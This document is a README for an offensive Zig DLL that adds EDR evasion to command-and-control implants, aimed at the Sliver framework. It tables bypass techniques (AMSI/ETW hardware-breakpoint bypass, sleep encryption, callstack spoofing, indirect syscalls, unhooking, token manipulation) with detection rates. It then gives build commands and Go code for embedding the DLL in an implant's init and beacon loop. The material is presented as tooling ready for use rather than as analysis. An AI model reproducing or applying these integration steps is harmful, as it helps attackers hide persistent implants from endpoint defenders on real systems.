# Valak ## What Standalone Zig evasion DLL for C2 implants. Drop-in sleep obfuscation, AMSI/ETW bypass, callstack spoofing. Protocol-agnostic — built for Sliver but works with any C2 that can call `syscall.SyscallN`. ## Evasion Stack | Technique | File | Detection Status (DbgMan, May 2026) | |---|---|---| | RC4 encrypted .text sleep | sleep.zig | 70% effective — core evasion primitive | | Callstack return-address zeroing | arch/hells_gate.s | 55% effective — terminates EDR frame walks | | HWBP AMSI bypass (DR0-VEH) | amsi.zig | 60% effective — no memory modification | | HWBP ETW bypass (DR0-VEH) | etw.zig | 65% effective — no memory modification | | FreshyCalls SSN extraction | syscall.zig | 65% effective — immune to inline hooks | | Indirect syscall dispatch | syscall.zig | 60% effective — random gadget pool | | KnownDlls ntdll unhooking | unhook.zig | 95% DETECTED by CrowdStrike/S1 | | Module stomping | stomp.zig | 80% DETECTED — backing-file integrity checks | | Token manipulation | token.zig | 90% DETECTED — lsass token access is T1 alert | ## Build ``` cd evasion zig build -Doptimize=ReleaseFast # → zig-out/bin/valak.dll ``` Then embed the DLL bytes into `go-bridge/embed_dll.go`: ```go var embeddedDLL = []byte{ // paste compiled .dll bytes } ``` ## Sliver Integration 1. Copy `go-bridge/` into `implant/sliver/evasion/valak/` 2. In Sliver's implant init: ```go import "github.com/BishopFox/sliver/implant/sliver/evasion/valak" func init() { valak.Start() go func() { time.Sleep(2 * time.Second) // wait for DLL load valak.PatchAll() }() } ``` 3. Replace `time.Sleep(d)` with `valak.EvasionSleep(d)` in Sliver's beacon loop 4. Build with: `go build -tags evasion` ## Verified Against - Microsoft x64 ABI (shadow space, 16-byte alignment) - PE/COFF .drectve section spec - Go compiler no-auto-vectorize behavior - DbgMan "EDR Tradecraft" (May 2026) - CrowdStrike 2026 Global Threat Report